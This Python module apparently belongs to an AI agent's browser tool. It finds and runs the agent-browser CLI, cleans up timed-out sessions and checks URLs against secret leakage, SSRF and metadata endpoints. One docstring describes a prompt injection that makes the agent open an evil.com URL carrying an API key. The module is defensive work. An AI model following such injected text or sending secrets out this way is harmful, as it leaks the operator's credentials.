def _agent_browser_candidate_present(path: str | None) -> bool:
|
|
if not path:
|
|
return False
|
|
if " " in path and path.split()[0].endswith("npx"):
|
|
return True
|
|
return os.path.exists(path) and (os.name == "nt" or os.access(path, os.X_OK))
|
|
|
|
|
|
def _resolve_npx_bin() -> Optional[str]:
|
|
"""Resolve a runnable npx, preferring the Hermes-managed/Homebrew extended PATH.
|
|
|
|
Bare PATH first would let a broken system npx shadow a healthy managed one
|
|
with no recovery, so every candidate is validated with ``node_tool_runnable``
|
|
before being trusted.
|
|
"""
|
|
extended_path = _merge_browser_path("")
|
|
if extended_path:
|
|
extended_npx = shutil.which("npx", path=extended_path)
|
|
if extended_npx and node_tool_runnable(extended_npx):
|
|
return extended_npx
|
|
npx_path = shutil.which("npx")
|
|
if npx_path and node_tool_runnable(npx_path):
|
|
return npx_path
|
|
return None
|
|
|
|
|
|
def _agent_browser_candidates(extended_path: str):
|
|
"""Yield agent-browser lookup candidates in resolution order (lazily — each is a filesystem probe).
|
|
|
|
Order: ambient PATH (global install) → extended PATH (Hermes-managed Node,
|
|
macOS versioned Homebrew, Termux/system dirs) → repo-local node_modules/.bin.
|
|
The local lookup goes through ``shutil.which`` with an explicit path so
|
|
Windows resolves the ``.cmd`` shim (CreateProcess cannot run npm's
|
|
extensionless POSIX shim — WinError 193) while POSIX keeps the plain one.
|
|
"""
|
|
yield shutil.which("agent-browser")
|
|
if extended_path:
|
|
yield shutil.which("agent-browser", path=extended_path)
|
|
local_bin_dir = Path(__file__).parent.parent / "node_modules" / ".bin"
|
|
if local_bin_dir.is_dir():
|
|
yield shutil.which("agent-browser", path=str(local_bin_dir))
|
|
|
|
|
|
def _find_agent_browser(*, validate: bool = True) -> str:
|
|
"""
|
|
Find the agent-browser CLI executable.
|
|
|
|
Checks in order: current PATH, Homebrew/common bin dirs, Hermes-managed
|
|
node, local node_modules/.bin/, npx fallback, then a lazy install.
|
|
|
|
Every candidate is validated with ``agent_browser_runnable`` before it is
|
|
cached. A bare ``shutil.which`` hit is NOT trusted: agent-browser's npm
|
|
postinstall re-points a global symlink at our local node_modules binary,
|
|
which disappears on the next ``hermes update`` and leaves a dangling link
|
|
that ``which`` still reports but exec fails on (exit 127). Validating lets a
|
|
dead candidate fall through instead of being cached and killing every
|
|
browser tool. ``validate=False`` (schema-time check_fn) only tests presence
|
|
and never caches.
|
|
|
|
Raises:
|
|
FileNotFoundError: If agent-browser is not installed
|
|
"""
|
|
global _cached_agent_browser, _agent_browser_resolved
|
|
if _agent_browser_resolved:
|
|
if _cached_agent_browser is None:
|
|
raise FileNotFoundError(
|
|
"agent-browser CLI not found (cached). Install it with: "
|
|
f"{_browser_install_hint()}\n"
|
|
"Or ensure npx is available in your PATH."
|
|
)
|
|
return _cached_agent_browser
|
|
|
|
def _accept(candidate: str) -> str:
|
|
# _agent_browser_resolved is set at each accept site (not before the
|
|
# search) so a concurrent reader never sees resolved=True with a None cache.
|
|
global _cached_agent_browser, _agent_browser_resolved
|
|
if validate:
|
|
_cached_agent_browser = candidate
|
|
_agent_browser_resolved = True
|
|
return candidate
|
|
|
|
ok = agent_browser_runnable if validate else _agent_browser_candidate_present
|
|
extended_path = _merge_browser_path("")
|
|
for candidate in _agent_browser_candidates(extended_path):
|
|
if candidate and ok(candidate):
|
|
return _accept(candidate)
|
|
|
|
# npx fallback (also searches the extended PATH)
|
|
if _resolve_npx_bin():
|
|
return _accept(NPX_AGENT_BROWSER_SENTINEL)
|
|
|
|
if not validate:
|
|
raise FileNotFoundError("agent-browser CLI not found")
|
|
|
|
# Nothing found — try lazy installation before giving up.
|
|
try:
|
|
from hermes_cli.dep_ensure import ensure_dependency
|
|
if ensure_dependency("browser"):
|
|
candidates = [
|
|
shutil.which("agent-browser"),
|
|
shutil.which("agent-browser", path=extended_path) if extended_path else None,
|
|
shutil.which("agent-browser", path=str(get_hermes_home() / "node_modules" / ".bin")),
|
|
shutil.which("agent-browser", path=str(get_hermes_home() / "node" / "bin")),
|
|
shutil.which("agent-browser", path=str(get_hermes_home() / "node")),
|
|
]
|
|
for recheck in candidates:
|
|
if recheck and agent_browser_runnable(recheck):
|
|
return _accept(recheck)
|
|
except Exception:
|
|
pass
|
|
|
|
_agent_browser_resolved = True
|
|
raise FileNotFoundError(
|
|
"agent-browser CLI not found. Install it with: "
|
|
f"{_browser_install_hint()}\n"
|
|
"Or ensure npx is available in your PATH."
|
|
)
|
|
|
|
|
|
def _kill_process_tree(proc: "subprocess.Popen") -> None:
|
|
"""Best-effort kill of *proc* and every descendant it spawned; never raises.
|
|
|
|
``Popen.kill()`` only signals the direct child. npm/npx fork helpers and
|
|
agent-browser's detached daemon grandchild, which survive a plain kill and
|
|
keep a capture pipe open so ``communicate()`` never sees EOF — on Windows
|
|
there is no non-blocking read to poll around that, so the whole tree must
|
|
go. No grace period: the caller already burned its full timeout waiting.
|
|
Delegates to :func:`agent.deadline.kill_process_tree` (taskkill /T /F,
|
|
killpg, plus a psutil sweep that reaches ``setsid``'d descendants) and
|
|
falls back to :func:`_legacy_kill_process_tree` on any failure.
|
|
"""
|
|
try:
|
|
from agent.deadline import kill_process_tree as _deadline_kill_tree
|
|
|
|
_deadline_kill_tree(proc.pid)
|
|
except Exception:
|
|
_legacy_kill_process_tree(proc)
|
|
|
|
|
|
def _legacy_kill_process_tree(proc: "subprocess.Popen") -> None:
|
|
"""Local tree-kill — fallback when agent.deadline is unavailable."""
|
|
if os.name == "nt":
|
|
try:
|
|
subprocess.run(
|
|
["taskkill", "/PID", str(proc.pid), "/T", "/F"],
|
|
check=False,
|
|
capture_output=True,
|
|
stdin=subprocess.DEVNULL,
|
|
)
|
|
except Exception:
|
|
pass
|
|
return
|
|
# os.killpg/signal.SIGKILL don't exist on Windows; this branch is
|
|
# POSIX-only (the `os.name == "nt"` check above already returns first
|
|
# on Windows), but resolve them defensively via getattr anyway so an
|
|
# accidental future refactor that drops that guard degrades to a plain
|
|
# kill() instead of AttributeError — same discipline as
|
|
# tools/mcp_stdio_watchdog.py's _terminate_process_group.
|
|
killpg = getattr(os, "killpg", None)
|
|
if killpg is None: # windows-footgun: ok - non-POSIX fallback
|
|
try:
|
|
proc.kill()
|
|
except Exception:
|
|
pass
|
|
return
|
|
try:
|
|
pgid = os.getpgid(proc.pid)
|
|
except (ProcessLookupError, OSError):
|
|
return
|
|
sigkill = getattr(signal, "SIGKILL", signal.SIGTERM)
|
|
for sig in (signal.SIGTERM, sigkill):
|
|
try:
|
|
killpg(pgid, sig)
|
|
except (ProcessLookupError, PermissionError, OSError):
|
|
return
|
|
|
|
|
|
def warm_agent_browser_npx_cache(timeout: float = 60.0) -> bool:
|
|
"""Best-effort pre-fetch of the agent-browser npm package via npx.
|
|
|
|
agent-browser resolves lazily via ``npx agent-browser`` (not a root
|
|
package.json dependency), so the first invocation in a session would pay
|
|
npx's registry fetch; ``hermes update`` / ``hermes doctor --fix`` call this
|
|
to warm the cache first. Runs with the credential-scrubbed env every other
|
|
agent-browser spawn uses (registry-fetched npm code must never see the
|
|
operator keyring), in its own process group, and tree-kills on timeout so
|
|
a surviving descendant cannot hold the capture pipe open.
|
|
Never raises; True only when npx actually exited 0.
|
|
"""
|
|
npx_bin = _resolve_npx_bin()
|
|
if not npx_bin:
|
|
return False
|
|
|
|
env = _build_browser_env()
|
|
env["PATH"] = _merge_browser_path(env.get("PATH", ""))
|
|
|
|
popen_kwargs: dict = {
|
|
"stdout": subprocess.PIPE,
|
|
"stderr": subprocess.PIPE,
|
|
"text": True,
|
|
"env": env,
|
|
"creationflags": windows_hide_flags(),
|
|
}
|
|
if os.name == "posix":
|
|
popen_kwargs["start_new_session"] = True
|
|
else:
|
|
popen_kwargs["creationflags"] |= getattr(subprocess, "CREATE_NEW_PROCESS_GROUP", 0)
|
|
|
|
cmd = [
|
|
npx_bin,
|
|
# --ignore-scripts: AGENT_BROWSER_NPX_SPEC is a floating ^0.26.0
|
|
# range, not an exact pin — a compromised future 0.26.x patch must
|
|
# not get to run its own install-time lifecycle scripts here.
|
|
"--ignore-scripts",
|
|
# --prefer-offline: once cached, repeat `hermes update`/`doctor
|
|
# --fix` runs shouldn't hit the registry just to re-confirm
|
|
# "latest" is still latest — that would defeat the point of
|
|
# warming the cache in the first place.
|
|
"--prefer-offline",
|
|
"-y",
|
|
AGENT_BROWSER_NPX_SPEC,
|
|
"--version",
|
|
]
|
|
try:
|
|
proc = subprocess.Popen(cmd, stdin=subprocess.DEVNULL, **popen_kwargs)
|
|
except Exception:
|
|
return False
|
|
try:
|
|
proc.communicate(timeout=timeout)
|
|
return proc.returncode == 0
|
|
except subprocess.TimeoutExpired:
|
|
_kill_process_tree(proc)
|
|
try:
|
|
proc.communicate(timeout=5)
|
|
except Exception:
|
|
pass
|
|
return False
|
|
except Exception:
|
|
_kill_process_tree(proc)
|
|
return False
|
|
|
|
|
|
from tools.browser_tool_snapshot import ( # noqa: F401
|
|
_store_full_snapshot,
|
|
_truncate_snapshot,
|
|
_redact_browser_output,
|
|
_extract_screenshot_path_from_text,
|
|
)
|
|
|
|
|
|
def _discard_timed_out_browser_session(
|
|
task_id: str,
|
|
session_info: Dict[str, Any],
|
|
task_socket_dir: str,
|
|
) -> None:
|
|
"""Drop a stuck client generation without losing cloud cleanup state."""
|
|
with _cleanup_lock:
|
|
if _active_sessions.get(task_id) is not session_info:
|
|
return
|
|
_stop_cdp_supervisor(task_id)
|
|
if session_info.get("bb_session_id") or session_info.get("cdp_url"):
|
|
import uuid
|
|
replacement = dict(session_info)
|
|
replacement["session_name"] = f"h_{uuid.uuid4().hex[:10]}"
|
|
replacement.pop("_first_nav", None)
|
|
_active_sessions[task_id] = replacement
|
|
else:
|
|
_active_sessions.pop(task_id, None)
|
|
_session_last_activity.pop(task_id, None)
|
|
|
|
bare_task_id = _bare_task_id_for_session_key(task_id)
|
|
if _last_active_session_key.get(bare_task_id) == task_id:
|
|
_last_active_session_key.pop(bare_task_id, None)
|
|
|
|
session_name = str(session_info.get("session_name") or "")
|
|
if session_name:
|
|
pid_file = os.path.join(task_socket_dir, f"{session_name}.pid")
|
|
if os.path.isfile(pid_file):
|
|
try:
|
|
daemon_pid = int(Path(pid_file).read_text(encoding="utf-8").strip())
|
|
if not _verify_reapable_browser_daemon(daemon_pid, task_socket_dir, session_name):
|
|
return
|
|
# Tree-kill: the daemon spawns Chromium
|
|
# children; terminating only the daemon PID leaks the whole
|
|
# Chromium tree. agent.deadline.kill_process_tree escalates
|
|
# SIGTERM → SIGKILL across the tree.
|
|
from agent import deadline as _deadline
|
|
|
|
_deadline.kill_process_tree(daemon_pid)
|
|
except (ProcessLookupError, ValueError, PermissionError, OSError):
|
|
logger.debug("Could not kill timed-out browser daemon for %s", session_name)
|
|
return
|
|
shutil.rmtree(task_socket_dir, ignore_errors=True)
|
|
|
|
|
|
def _read_browser_daemon_pid(task_socket_dir: str, session_name: str) -> Optional[int]:
|
|
"""Read the agent-browser daemon PID for a session (best-effort)."""
|
|
pid_file = os.path.join(task_socket_dir, f"{session_name}.pid")
|
|
try:
|
|
return int(Path(pid_file).read_text(encoding="utf-8").strip())
|
|
except (OSError, ValueError):
|
|
return None
|
|
|
|
|
|
def _browser_daemon_responsive(task_socket_dir: str, probe_timeout_s: float = 1.0) -> bool:
|
|
"""Cheap liveness probe: connect to the daemon's unix control socket.
|
|
|
|
A successful connect proves the accept loop is alive (the command wedged on
|
|
the page/CDP side, not the daemon). Windows uses named pipes — no probe is
|
|
possible, so report unresponsive (tree-kill + respawn is the safe recovery).
|
|
"""
|
|
if os.name == "nt":
|
|
return False
|
|
import socket as socket_mod
|
|
|
|
if not hasattr(socket_mod, "AF_UNIX"):
|
|
return False
|
|
try:
|
|
entries = os.listdir(task_socket_dir)
|
|
except OSError:
|
|
return False
|
|
sock_paths = [
|
|
os.path.join(task_socket_dir, e) for e in entries if e.endswith(".sock")
|
|
]
|
|
for sock_path in sock_paths:
|
|
try:
|
|
with socket_mod.socket(socket_mod.AF_UNIX, socket_mod.SOCK_STREAM) as s:
|
|
s.settimeout(probe_timeout_s)
|
|
s.connect(sock_path)
|
|
return True
|
|
except OSError:
|
|
continue
|
|
return False
|
|
|
|
|
|
def _handle_browser_command_timeout(
|
|
task_id: str,
|
|
session_info: Dict[str, Any],
|
|
task_socket_dir: str,
|
|
) -> None:
|
|
"""Recover session state after a browser command timeout.
|
|
|
|
* Cloud / CDP sessions: no local daemon to probe — replace the stuck client
|
|
generation now (fresh ``session_name``, same ``bb_session_id`` so cloud
|
|
cleanup still works).
|
|
* Local daemon alive (PID live, identity-verified, control socket accepts):
|
|
only the *command* wedged; mark the session suspect and let the next use
|
|
recycle it via ``ensure_healthy`` → clean ``close`` → fresh session.
|
|
* Local daemon wedged/dead: it cannot service a clean close and its Chromium
|
|
children would leak — tree-kill and evict now; the next call respawns.
|
|
|
|
Both local branches ``mark_suspect`` first (cheap, lock-free) so the
|
|
poisoned-cache invariant holds even if eviction races another thread's
|
|
replacement (the flag then costs one harmless no-op teardown).
|
|
"""
|
|
if session_info.get("bb_session_id") or session_info.get("cdp_url"):
|
|
_discard_timed_out_browser_session(task_id, session_info, task_socket_dir)
|
|
return
|
|
|
|
_browser_session_backend(task_id).mark_suspect(
|
|
"browser command timed out; session may be poisoned"
|
|
)
|
|
|
|
session_name = str(session_info.get("session_name") or "")
|
|
daemon_pid = _read_browser_daemon_pid(task_socket_dir, session_name) if session_name else None
|
|
daemon_alive = (
|
|
daemon_pid is not None
|
|
and _pid_exists(daemon_pid)
|
|
and _verify_reapable_browser_daemon(daemon_pid, task_socket_dir, session_name)
|
|
and _browser_daemon_responsive(task_socket_dir)
|
|
)
|
|
if daemon_alive:
|
|
logger.warning(
|
|
"browser daemon for %s is alive after command timeout; session "
|
|
"marked suspect and will be recycled at next use", task_id,
|
|
)
|
|
return
|
|
|
|
logger.warning(
|
|
"browser daemon for %s is wedged or dead after command timeout; "
|
|
"tree-killing and evicting the session", task_id,
|
|
)
|
|
_discard_timed_out_browser_session(task_id, session_info, task_socket_dir)
|
|
# The poisoned entry is gone (evicted, or superseded by a concurrent
|
|
# replacement discard refused to touch) — either way the cache no longer
|
|
# holds the timed-out session, so drop the flag: it must not poison a
|
|
# session created later under the same key.
|
|
_suspect_browser_sessions.pop(task_id, None)
|
|
|
|
|
|
def _pid_exists(pid: int) -> bool:
|
|
"""Best-effort 'is this PID alive' check (signal 0 / psutil on Windows)."""
|
|
if pid <= 0:
|
|
return False
|
|
if os.name == "nt":
|
|
try:
|
|
import psutil
|
|
|
|
return psutil.pid_exists(pid)
|
|
except Exception:
|
|
return False
|
|
try:
|
|
os.kill(pid, 0) # windows-footgun: ok — psutil.pid_exists above handles Windows
|
|
except ProcessLookupError:
|
|
return False
|
|
except PermissionError:
|
|
return True
|
|
except OSError:
|
|
return False
|
|
return True
|
|
|
|
|
|
def _interpret_browser_command_output(command: str, stdout: str, stderr: str, returncode: int) -> Dict[str, Any]:
|
|
"""Turn a finished agent-browser process's output into a result dict.
|
|
|
|
Empty stdout with rc=0 is a broken state (stale daemon) and is reported as
|
|
failure rather than a silent ``{"success": True, "data": {}}`` — except for
|
|
commands in ``_EMPTY_OK_COMMANDS``. Non-JSON output is an error, except
|
|
for ``screenshot`` where the saved path is recovered from the prose.
|
|
"""
|
|
if stderr and stderr.strip():
|
|
level = logging.WARNING if returncode != 0 else logging.DEBUG
|
|
logger.log(level, "browser '%s' stderr: %s", command, stderr.strip()[:500])
|
|
|
|
stdout_text = stdout.strip()
|
|
if not stdout_text and returncode == 0 and command not in _EMPTY_OK_COMMANDS:
|
|
logger.warning("browser '%s' returned empty output (rc=0)", command)
|
|
return {"success": False, "error": f"Browser command '{command}' returned no output"}
|
|
if not stdout_text:
|
|
if returncode != 0:
|
|
error_msg = stderr.strip() if stderr else f"Command failed with code {returncode}"
|
|
logger.warning("browser '%s' failed (rc=%s): %s", command, returncode, error_msg[:300])
|
|
return {"success": False, "error": error_msg}
|
|
return {"success": True, "data": {}}
|
|
|
|
try:
|
|
parsed = json.loads(stdout_text)
|
|
except json.JSONDecodeError:
|
|
raw = stdout_text[:2000]
|
|
logger.warning("browser '%s' returned non-JSON output (rc=%s): %s",
|
|
command, returncode, raw[:500])
|
|
if command == "screenshot":
|
|
stderr_text = (stderr or "").strip()
|
|
combined_text = "\n".join(part for part in [stdout_text, stderr_text] if part)
|
|
recovered_path = _extract_screenshot_path_from_text(combined_text)
|
|
if recovered_path and Path(recovered_path).exists():
|
|
logger.info(
|
|
"browser 'screenshot' recovered file from non-JSON output: %s",
|
|
recovered_path,
|
|
)
|
|
return {"success": True, "data": {"path": recovered_path, "raw": raw}}
|
|
return {"success": False, "error": f"Non-JSON output from agent-browser for '{command}': {raw}"}
|
|
|
|
# Empty snapshot content is a common sign of daemon/CDP issues.
|
|
if command == "snapshot" and parsed.get("success"):
|
|
snap_data = parsed.get("data", {})
|
|
if not snap_data.get("snapshot") and not snap_data.get("refs"):
|
|
logger.warning("snapshot returned empty content. "
|
|
"Possible stale daemon or CDP connection issue. "
|
|
"returncode=%s", returncode)
|
|
return parsed
|
|
|
|
|
|
def _run_browser_command(
|
|
task_id: str,
|
|
command: str,
|
|
args: List[str] = None,
|
|
timeout: Optional[int] = None,
|
|
_engine_override: Optional[str] = None,
|
|
) -> Dict[str, Any]:
|
|
"""Run one agent-browser CLI command against the task's session; returns its parsed JSON.
|
|
|
|
``timeout=None`` reads ``browser.command_timeout`` (default 30s).
|
|
``_engine_override`` forces an engine for this call only (the Lightpanda
|
|
fallback uses it to retry with Chrome without touching global state).
|
|
"""
|
|
if timeout is None:
|
|
timeout = _safe_command_timeout()
|
|
args = args or []
|
|
|
|
# Build the command
|
|
try:
|
|
browser_cmd = _find_agent_browser()
|
|
except FileNotFoundError as e:
|
|
logger.warning("agent-browser CLI not found: %s", e)
|
|
return {"success": False, "error": str(e)}
|
|
|
|
if _requires_real_termux_browser_install(browser_cmd):
|
|
error = _termux_browser_install_error()
|
|
logger.warning("browser command blocked on Termux: %s", error)
|
|
return {"success": False, "error": error}
|
|
|
|
# Local mode with no Chromium on disk: fail fast with an actionable
|
|
# message instead of hanging for _command_timeout seconds per call.
|
|
# Skip when engine=lightpanda — LP doesn't need Chromium for navigation.
|
|
if (
|
|
_is_local_mode()
|
|
and not _chromium_installed()
|
|
and _get_browser_engine() != "lightpanda"
|
|
and not _maybe_autoinstall_chromium()
|
|
):
|
|
if _running_in_docker():
|
|
hint = (
|
|
"Chromium browser is missing. You're running in Docker — pull "
|
|
"the latest image to get the bundled Chromium: "
|
|
"docker pull ghcr.io/nousresearch/hermes-agent:latest"
|
|
)
|
|
else:
|
|
hint = (
|
|
"Chromium browser is missing. Install it with: "
|
|
"npx agent-browser install --with-deps "
|
|
"(or: npx playwright install --with-deps chromium)"
|
|
)
|
|
logger.warning("browser command blocked: %s", hint)
|
|
return {"success": False, "error": hint}
|
|
|
|
from tools.interrupt import is_interrupted
|
|
if is_interrupted():
|
|
return {"success": False, "error": "Interrupted"}
|
|
|
|
# Get session info (creates Browserbase session with proxies if needed)
|
|
try:
|
|
session_info = _get_session_info(task_id)
|
|
except Exception as e:
|
|
logger.warning("Failed to create browser session for task=%s: %s", task_id, e)
|
|
return {"success": False, "error": f"Failed to create browser session: {str(e)}"}
|
|
# Cleanup stops the supervisor before closing the backend; keep it stopped.
|
|
if command != "close" and session_info.get("cdp_url"):
|
|
_ensure_cdp_supervisor(task_id)
|
|
|
|
# Build the command with the appropriate backend flag.
|
|
# Cloud mode: --cdp <websocket_url> connects to Browserbase.
|
|
# Local mode: --session <name> launches a local headless Chromium.
|
|
# The rest of the command (--json, command, args) is identical.
|
|
if session_info.get("cdp_url"):
|
|
# Cloud mode — connect to remote Browserbase browser via CDP
|
|
# IMPORTANT: Do NOT use --session with --cdp. In agent-browser >=0.13,
|
|
# --session creates a local browser instance and silently ignores --cdp.
|
|
backend_args = ["--cdp", session_info["cdp_url"]]
|
|
else:
|
|
# Local mode — launch Chromium (headless by default, headed when configured)
|
|
backend_args = ["--session", session_info["session_name"]]
|
|
if _is_headed_mode():
|
|
backend_args.append("--headed")
|
|
|
|
# Lightpanda engine injection (local mode only, agent-browser v0.25.3+).
|
|
# Use the resolved session backend rather than global cloud-provider state:
|
|
# hybrid private-URL routing can create a local sidecar while a cloud
|
|
# provider remains configured for public URLs.
|
|
engine = _engine_override or _get_browser_engine()
|
|
if engine != "auto" and not _is_camofox_mode() and not session_info.get("cdp_url"):
|
|
backend_args += ["--engine", engine]
|
|
|
|
cmd_parts = _agent_browser_argv(browser_cmd) + backend_args + ["--json", command] + args
|
|
|
|
try:
|
|
task_socket_dir = _prepare_session_socket_dir(session_info["session_name"])
|
|
logger.debug("browser cmd=%s task=%s socket_dir=%s (%d chars)",
|
|
command, task_id, task_socket_dir, len(task_socket_dir))
|
|
browser_env = _agent_browser_command_env(task_socket_dir)
|
|
|
|
# Chromium-only launch flags are rejected by Lightpanda. Strip both
|
|
# the current and legacy variables for Lightpanda commands; explicit
|
|
# Chrome commands and fallback use the shared Chromium policy.
|
|
if engine == "lightpanda":
|
|
_stripped_args = browser_env.pop("AGENT_BROWSER_ARGS", None)
|
|
_stripped_flags = browser_env.pop("AGENT_BROWSER_CHROME_FLAGS", None)
|
|
if _stripped_args is not None or _stripped_flags is not None:
|
|
logger.debug(
|
|
"browser: stripped Chromium-only AGENT_BROWSER_ARGS/"
|
|
"AGENT_BROWSER_CHROME_FLAGS for Lightpanda command %s "
|
|
"(agent-browser rejects them with --engine lightpanda)",
|
|
command,
|
|
)
|
|
else:
|
|
_apply_chromium_sandbox_args(browser_env)
|
|
|
|
stdout_path = os.path.join(task_socket_dir, f"_stdout_{command}")
|
|
stderr_path = os.path.join(task_socket_dir, f"_stderr_{command}")
|
|
proc = _popen_agent_browser(cmd_parts, browser_env, task_socket_dir, command)
|
|
|
|
try:
|
|
proc.wait(timeout=timeout)
|
|
except subprocess.TimeoutExpired:
|
|
proc.kill()
|
|
proc.wait()
|
|
stdout, stderr = _read_command_output_files(stdout_path, stderr_path)
|
|
_unlink_command_output_files(stdout_path, stderr_path)
|
|
_handle_browser_command_timeout(task_id, session_info, task_socket_dir)
|
|
if stderr and stderr.strip():
|
|
logger.warning(
|
|
"browser '%s' stderr after timeout: %s",
|
|
command,
|
|
stderr.strip()[:500],
|
|
)
|
|
logger.warning("browser '%s' timed out after %ds (task=%s, socket_dir=%s)",
|
|
command, timeout, task_id, task_socket_dir)
|
|
result = {
|
|
"success": False,
|
|
"error": _format_browser_timeout_error(command, timeout, stdout, stderr),
|
|
}
|
|
# Fall through to fallback check below
|
|
else:
|
|
with open(stdout_path, "r", encoding="utf-8") as f:
|
|
stdout = f.read()
|
|
with open(stderr_path, "r", encoding="utf-8") as f:
|
|
stderr = f.read()
|
|
_unlink_command_output_files(stdout_path, stderr_path)
|
|
result = _interpret_browser_command_output(command, stdout, stderr, proc.returncode)
|
|
|
|
except Exception as e:
|
|
logger.warning("browser '%s' exception: %s", command, e, exc_info=True)
|
|
result = {"success": False, "error": str(e)}
|
|
|
|
# --- Lightpanda automatic Chrome fallback ---
|
|
# If engine is lightpanda and the result looks broken, retry with Chrome.
|
|
# This runs for ALL exit paths (timeout, empty, non-JSON, nonzero rc, parsed).
|
|
fallback_reason = _lightpanda_fallback_reason(engine, command, result)
|
|
if fallback_reason:
|
|
logger.info(
|
|
"Lightpanda fallback: retrying '%s' with Chrome (task=%s): %s",
|
|
command,
|
|
task_id,
|
|
fallback_reason,
|
|
)
|
|
# For screenshots, use the dedicated Chrome fallback helper
|
|
# (spins up a separate Chrome session to the same URL).
|
|
if command == "screenshot":
|
|
fallback_result = _chrome_fallback_screenshot(task_id, args or [], timeout)
|
|
else:
|
|
fallback_result = _run_chrome_fallback_command(task_id, command, args, timeout)
|
|
return _annotate_lightpanda_fallback(fallback_result, fallback_reason)
|
|
|
|
return result
|
|
|
|
|
|
# ============================================================================
|
|
# Browser Tool Functions
|
|
# ============================================================================
|
|
|
|
def _secret_url_error(url: str) -> Optional[dict]:
|
|
"""Refuse URLs that embed an API key/token (raw and URL-decoded, catching ``%2D`` tricks).
|
|
|
|
A prompt injection could otherwise make the agent navigate to
|
|
``https://evil.com/steal?key=sk-ant-...`` to exfiltrate secrets.
|
|
"""
|
|
import urllib.parse
|
|
from agent.redact import _PREFIX_RE
|
|
|
|
if _PREFIX_RE.search(url) or _PREFIX_RE.search(urllib.parse.unquote(url)):
|
|
return {"success": False, "error": "Blocked: URL contains what appears to be an API key or token. Secrets must not be sent in URLs."}
|
|
return None
|
|
|
|
|
|
def _url_policy_error(url: str, *, auto_local: bool = False) -> Optional[dict]:
|
|
"""Backend-aware URL checks on an already-normalized URL; None if allowed.
|
|
|
|
Order matters and every step is a floor for the next:
|
|
1. Credential-like query params are refused for cloud backends (third-party
|
|
readers) — allowed for local backends and for the hybrid local sidecar.
|
|
2. Cloud metadata / IMDS endpoints are refused UNCONDITIONALLY, for every
|
|
backend including pure-local Chromium and off-host CDP (a local Chromium
|
|
on a cloud VM still reaches the host IMDS).
|
|
3. Private/internal addresses are refused unless the backend is local, the
|
|
URL is being auto-routed to the local sidecar (``auto_local``), or
|
|
``browser.allow_private_urls`` opts out.
|
|
4. Website policy (config allow/deny lists).
|
|
"""
|
|
local = _is_local_backend()
|
|
sensitive_query_key = _sensitive_query_param_name(url)
|
|
if sensitive_query_key and not local and not auto_local:
|
|
return {"success": False, "error": (
|
|
"Blocked: URL contains a credential-like query parameter "
|
|
f"({sensitive_query_key}). Cloud browser backends are third-party "
|
|
"readers; use a local browser/CDP session or remove the sensitive "
|
|
"query parameter before navigating.")}
|
|
if _is_always_blocked_url(url):
|
|
return {"success": False, "error": "Blocked: URL targets a cloud metadata endpoint"}
|
|
if not local and not auto_local and not _allow_private_urls() and not _is_safe_url(url):
|
|
return {"success": False, "error": "Blocked: URL targets a private or internal address"}
|
|
blocked = check_website_access(url)
|
|
if blocked:
|
|
return {"success": False, "error": blocked["message"],
|
|
"blocked_by_policy": {"host": blocked["host"], "rule": blocked["rule"], "source": blocked["source"]}}
|
|
return None
|
|
|
|
|
|
def evaluate_url_safety(url: str) -> Optional[dict]:
|
|
"""Run URL safety checks; None if safe, else an error dict"""
|
|
err = _secret_url_error(url)
|
|
if err:
|
|
return err
|
|
url = _normalize_url_for_request(url)
|
|
return _secret_url_error(url) or _url_policy_error(url)
|
|
|
|
|
|
_BOT_DETECTION_TITLE_PATTERNS = (
|
|
"access denied", "access to this page has been denied",
|
|
"blocked", "bot detected", "verification required",
|
|
"please verify", "are you a robot", "captcha",
|
|
"cloudflare", "ddos protection", "checking your browser",
|
|
"just a moment", "attention required",
|
|
)
|
|
|
|
|
|
def _post_redirect_block(nav_session_key: str, url: str, final_url: str, auto_local_this_nav: bool) -> Optional[str]:
|
|
"""Post-redirect SSRF check; returns a blocked JSON payload or None.
|
|
|
|
If the browser followed a redirect to a private/internal address the model
|
|
could read internal content via later snapshots, so the page is navigated to
|
|
about:blank first. The cloud-metadata floor fires for every backend (even the
|
|
local sidecar); the private-address check is skipped for local backends and
|
|
the hybrid sidecar, and when ``browser.allow_private_urls`` opts out.
|
|
"""
|
|
if not final_url or final_url == url:
|
|
return None
|
|
if _is_always_blocked_url(final_url):
|
|
_run_browser_command(nav_session_key, "open", ["about:blank"], timeout=10)
|
|
return json.dumps({
|
|
"success": False,
|
|
"error": "Blocked: redirect landed on a cloud metadata endpoint",
|
|
})
|
|
if (
|
|
not _is_local_backend()
|
|
and not auto_local_this_nav
|
|
and not _allow_private_urls()
|
|
and not _is_safe_url(final_url)
|
|
):
|
|
_run_browser_command(nav_session_key, "open", ["about:blank"], timeout=10)
|
|
return json.dumps({
|
|
"success": False,
|
|
"error": "Blocked: redirect landed on a private/internal address",
|
|
})
|
|
return None
|
|
|
|
|
|
def _attach_auto_snapshot(response: Dict[str, Any], nav_session_key: str) -> None:
|
|
"""Add a compact snapshot to a navigate response so the model can act without browser_snapshot."""
|
|
try:
|
|
snap_result = _run_browser_command(nav_session_key, "snapshot", ["-c"])
|
|
if snap_result.get("success"):
|
|
snap_data = snap_result.get("data", {})
|
|
snapshot_text = snap_data.get("snapshot", "")
|
|
refs = snap_data.get("refs", {})
|
|
threshold = get_browser_snapshot_threshold()
|
|
if len(snapshot_text) > threshold:
|
|
snapshot_text = _truncate_snapshot(snapshot_text, max_chars=threshold)
|
|
response["snapshot"] = _redact_browser_output(snapshot_text)
|
|
response["element_count"] = len(refs) if refs else 0
|
|
if snap_result.get("fallback_warning") and not response.get("fallback_warning"):
|
|
_copy_fallback_warning(response, snap_result)
|
|
except Exception as e:
|
|
logger.debug("Auto-snapshot after navigate failed: %s", e)
|
|
|
|
|
|
def browser_navigate(url: str, task_id: Optional[str] = None) -> str:
|
|
"""Navigate to ``url``; returns JSON with title, compact snapshot and, on first nav, stealth features."""
|
|
# Hybrid routing decides BEFORE the safety checks whether this URL goes to a
|
|
# local Chromium sidecar (cloud provider configured + private URL +
|
|
# ``browser.auto_local_for_private_urls``); the cloud provider never sees
|
|
# the URL in that case, so the private-address checks are relaxed for it.
|
|
safety_error = _secret_url_error(url)
|
|
if safety_error is None:
|
|
url = _normalize_url_for_request(url)
|
|
safety_error = _secret_url_error(url)
|
|
if safety_error is not None:
|
|
return json.dumps(safety_error)
|
|
|
|
effective_task_id = task_id or "default"
|
|
nav_session_key = _navigation_session_key(effective_task_id, url)
|
|
auto_local_this_nav = _is_local_sidecar_key(nav_session_key)
|
|
|
|
safety_error = _url_policy_error(url, auto_local=auto_local_this_nav)
|
|
if safety_error is not None:
|
|
return json.dumps(safety_error)
|
|
|
|
# Camofox backend — delegate after safety checks pass
|
|
